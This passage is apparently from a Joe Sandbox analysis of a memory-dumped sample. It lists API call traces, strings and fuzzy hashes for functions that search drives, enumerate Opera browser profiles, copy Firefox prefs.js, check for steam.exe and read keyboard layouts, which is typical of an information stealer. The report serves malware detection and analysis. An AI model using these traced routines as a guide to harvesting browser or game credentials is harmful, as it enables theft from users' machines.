CloseWindow.USER32(00000000), ref: 004120EF

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
String ID:
API String ID: 2610876673-0
Opcode ID: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
Instruction ID: f6e3f0428e96004f8b83f7710fafbd9962f3d673da3a1d35a18d8dcfea6c860f
Opcode Fuzzy Hash: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
Instruction Fuzzy Hash: 0251EA72800218AFDF15EFA1ED498EE7FBAFF08319F045525F901E2120E7369A55DB61

Function 0041543D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0041546A
FindFirstFileA.KERNEL32(?,?), ref: 00415481
StrCmpCA.SHLWAPI(?,00436A80), ref: 004154A2
StrCmpCA.SHLWAPI(?,00436A84), ref: 004154BC
lstrcatA.KERNEL32(?), ref: 0041550D
lstrcatA.KERNEL32(?), ref: 00415520
lstrcatA.KERNEL32(?,?), ref: 00415534
lstrcatA.KERNEL32(?,?), ref: 00415547
lstrcatA.KERNEL32(?,00436A88), ref: 00415559
lstrcatA.KERNEL32(?,?), ref: 0041556D

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

FindNextFileA.KERNEL32(?,?), ref: 00415623
FindClose.KERNEL32(?), ref: 00415637

Strings

%s\%s, xrefs: 0041545E

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
String ID: %s\%s
API String ID: 1150833511-4073750446
Opcode ID: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
Instruction ID: 7b4a02d1ce16c29d0e311cc455c9dd4e2592c9f450b56a316f79c40a9e4a8b0e
Opcode Fuzzy Hash: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
Instruction Fuzzy Hash: 71515FB190021D9BCF64DF60CC89AC9B7BDAB48305F1045E6E609E3250EB369B89CF65

Function 0040BF4D Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,\*.*,0043682E,0040CC6B,?,?), ref: 0040BFC5
StrCmpCA.SHLWAPI(?,00437470), ref: 0040BFE5
StrCmpCA.SHLWAPI(?,00437474), ref: 0040BFFF
StrCmpCA.SHLWAPI(?,Opera,00436843,00436842,00436837,00436836,00436833,00436832,0043682F), ref: 0040C08B
StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C099
StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C0A7

Strings

\*.*, xrefs: 0040BF73
Opera, xrefs: 0040C083
Opera Crypto, xrefs: 0040C09F
Opera GX, xrefs: 0040C091

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID: Opera$Opera Crypto$Opera GX$\*.*
API String ID: 2567437900-1710495004
Opcode ID: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
Instruction ID: c4b769843fd96ba5a9993bec0907288b27e6520762e28c1f4f52d27b6ca0eed4
Opcode Fuzzy Hash: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
Instruction Fuzzy Hash: 0E021D71A401299BCF21FB26DD466CD7775AF14308F4111EAB948B3191DBB86FC98F88

Function 00415142 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 146stringCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004151C2
_memset.LIBCMT ref: 004151E5
GetDriveTypeA.KERNEL32(?), ref: 004151EE
lstrcpyA.KERNEL32(?,?), ref: 0041520E
lstrcpyA.KERNEL32(?,?), ref: 00415229

Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414D1C
Part of subcall function 00414CC8: FindFirstFileA.KERNEL32(?,?), ref: 00414D33
Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D4F
Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D60
Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DC2
Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DFF
Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414E28
Part of subcall function 00414CC8: lstrcatA.KERNEL32(?,?), ref: 00414E3D

lstrcpyA.KERNEL32(?,00000000), ref: 0041524A
lstrlenA.KERNEL32(?), ref: 004152C4

Strings

%DRIVE_FIXED%, xrefs: 00415230
%DRIVE_REMOVABLE%, xrefs: 00415215
*%DRIVE_FIXED%*, xrefs: 0041515E
*%DRIVE_REMOVABLE%*, xrefs: 0041518F

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
API String ID: 441469471-147700698
Opcode ID: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
Instruction ID: 002cc7b8fd832fc02ac953dee8a9373947a5751985c47ec76440b2e4c0201c02
Opcode Fuzzy Hash: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
Instruction Fuzzy Hash: 1B512DB190021CAFDF219FA1CC85BDA7BB9FB09304F1041AAEA48A7111E7355E89CF59

Function 00401D80 Relevance: 16.3, APIs: 8, Strings: 1, Instructions: 529fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

FindFirstFileA.KERNEL32(?,?,0043A9AC,0043A9B0,004369FA,004369F7,00417908,?,00000000), ref: 00401FA4
StrCmpCA.SHLWAPI(?,0043A9B4), ref: 00401FD7
StrCmpCA.SHLWAPI(?,0043A9B8), ref: 00401FF1
FindFirstFileA.KERNEL32(?,?,0043A9BC,0043A9C0,?,0043A9C4,004369FB), ref: 004020DD

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindNextFileA.KERNEL32(?,?), ref: 004023A2
FindClose.KERNEL32(?), ref: 004023B6
FindNextFileA.KERNEL32(?,?), ref: 004026C6
FindClose.KERNEL32(?), ref: 004026DA

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416E97: Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE

Strings

\*.*, xrefs: 00401E9E

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Find$lstrcpy$Close$CreateFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
String ID: \*.*
API String ID: 1116797323-1173974218
Opcode ID: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
Instruction ID: 84c523e9d2ff6d0b2cceb644b0baa1646f1dc192954122ea0c18f52f03966360
Opcode Fuzzy Hash: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
Instruction Fuzzy Hash: 6C32EC71A401299BCF21FB25DD4A6CD7375AF04308F5100EAB548B71A1DBB86FC98F99

Function 0040D5C6 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,00437570,004368A3,?,?,?), ref: 0040D647
StrCmpCA.SHLWAPI(?,00437574), ref: 0040D668
StrCmpCA.SHLWAPI(?,00437578), ref: 0040D682
StrCmpCA.SHLWAPI(?,prefs.js,0043757C,?,004368AE), ref: 0040D70E

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

CopyFileA.KERNEL32(?,?,00000001,0043758C,004368AF), ref: 0040D7E8
DeleteFileA.KERNEL32(?), ref: 0040D8B3
FindNextFileA.KERNELBASE(?,?), ref: 0040D956
FindClose.KERNEL32(?), ref: 0040D96A

Strings

prefs.js, xrefs: 0040D702

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
String ID: prefs.js
API String ID: 893096357-3783873740
Opcode ID: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
Instruction ID: 927356911e44c3405f4de0d2be1bd74ddf2f7452577bbc1ac17ea627ea54bfb8
Opcode Fuzzy Hash: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
Instruction Fuzzy Hash: 38A11C71D001289BCF60FB65DD46BCD7375AF04318F4101EAA808B7292DB79AEC98F99

Function 0040B5DF Relevance: 13.7, APIs: 9, Instructions: 217fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,00437424,00436822,?,?,?), ref: 0040B657
StrCmpCA.SHLWAPI(?,00437428), ref: 0040B678
StrCmpCA.SHLWAPI(?,0043742C), ref: 0040B692
StrCmpCA.SHLWAPI(?,00437430,?,00436823), ref: 0040B71F
StrCmpCA.SHLWAPI(?), ref: 0040B780

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 0040ABE5: CopyFileA.KERNEL32(?,?,00000001,004373D0,00436812,?,?,?), ref: 0040AC8A

FindNextFileA.KERNELBASE(?,?), ref: 0040B8EB
FindClose.KERNEL32(?), ref: 0040B8FF

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
String ID:
API String ID: 3801961486-0
Opcode ID: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
Instruction ID: de252c0fab1b0e9a2d3383b13184952b75e93cbc882370f7403094166be9312a
Opcode Fuzzy Hash: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
Instruction Fuzzy Hash: 7E812C7290021C9BCF20FB75DD46ADD7779AB04308F4501A6EC48B3291EB789E998FD9

Function 004124A8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 004124B2
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004124D4
Process32First.KERNEL32(00000000,00000128), ref: 004124E4
Process32Next.KERNEL32(00000000,00000128), ref: 004124F6
StrCmpCA.SHLWAPI(?,steam.exe), ref: 00412508
CloseHandle.KERNEL32(00000000), ref: 00412521

Strings

steam.exe, xrefs: 004124B7, 00412500

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID: steam.exe
API String ID: 1799959500-2826358650
Opcode ID: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
Instruction ID: 012bf4d8d1ff090a25d7979138f5f9e06e77e1c880a3c2a583d4811a910fbd8f
Opcode Fuzzy Hash: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
Instruction Fuzzy Hash: 17012170A01224DFDB74DB64DD44BDE77B9AF08311F8001E6E409E2290EB388F90CB15

Function 00410DDB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

LocalFree.KERNEL32(00000000), ref: 00410EFF

Strings

/ , xrefs: 00410E73

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

